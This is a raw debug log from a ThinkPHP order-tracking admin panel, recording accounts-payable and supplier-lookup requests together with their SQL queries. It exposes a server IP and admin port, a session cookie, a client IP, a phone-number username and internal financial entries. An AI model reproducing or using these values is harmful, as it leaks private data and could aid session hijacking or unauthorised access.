/alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001670s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009259s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000586s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001617s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000627s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001510s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001389s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001807s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000673s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001509s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountspayable` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.000722s ] [ sql ] [ SQL ] INSERT INTO `ot_accountspayable` (`subject_type` , `suppliercustomer_id` , `worker_id` , `explain` , `paid_money` , `factorymge_id` , `year` , `month` , `day` , `createtime` , `updatetime` , `yu_money`) VALUES (1 , 77 , 0 , '6月份运费' , 57228 , 40 , 2022 , 7 , 20 , 1658309317 , 1658309317 , 690737.81) [ RunTime:0.005594s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.001914s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `createtime` DESC LIMIT 1 [ RunTime:0.001061s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`payable_money` , `payable_id` , `subject_type` , `explain` , `factorymge_id` , `createtime` , `updatetime` , `year` , `month` , `day` , `yu_money`) VALUES (57228 , 703 , 1 , '6月份运费' , 40 , 1658309317 , 1658309317 , 2022 , 7 , 20 , -665707.76558402) [ RunTime:0.005359s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001513s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 添加贷方' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"1\",\"suppliercustomer_id\":\"77\",\"worker_id\":\"\",\"explain\":\"6\\u6708\\u4efd\\u8fd0\\u8d39\",\"paid_money\":\"57228\"}}' , '/admin/financial/accountspayable/addyifu?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309317) [ RunTime:0.006214s ] --------------------------------------------------------------- [ 2022-07-20T17:28:37+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318506 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1658308318506 [运行时间:0.075255s][吞吐率:13.29req/s] [内存消耗:5,683.33kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001314s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1658308318506', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002329s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000126s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000477s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001354s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000464s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001163s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001242s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001911s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.001083s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001452s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001056s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001158s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001149s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.002961s ] --------------------------------------------------------------- [ 2022-07-20T17:43:37+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.056081s][吞吐率:17.83req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001138s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001714s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/add.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000174s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.001103s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001573s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000439s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001304s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001144s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001774s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000439s ] --------------------------------------------------------------- [ 2022-07-20T17:43:38+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658310217 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658310217 [运行时间:0.035625s][吞吐率:28.07req/s] [内存消耗:3,854.94kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001291s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658310217', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001740s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:43:39+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.052628s][吞吐率:19.00req/s] [内存消耗:4,963.06kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001608s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008129s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000617s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001705s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000404s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001400s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658310219) [ RunTime:0.005392s ] --------------------------------------------------------------- [ 2022-07-20T17:43:41+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.054227s][吞吐率:18.44req/s] [内存消耗:4,963.09kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001245s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001654s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006645s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000711s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001662s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000498s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000523s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001679s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658310221) [ RunTime:0.003350s ] --------------------------------------------------------------- [ 2022-07-20T17:43:42+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.058501s][吞吐率:17.09req/s] [内存消耗:4,963.14kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001394s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '3', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001782s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009200s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.001147s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001426s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000610s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 20,10 [ RunTime:0.000729s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001654s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"3\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658310222) [ RunTime:0.005854s ] --------------------------------------------------------------- [ 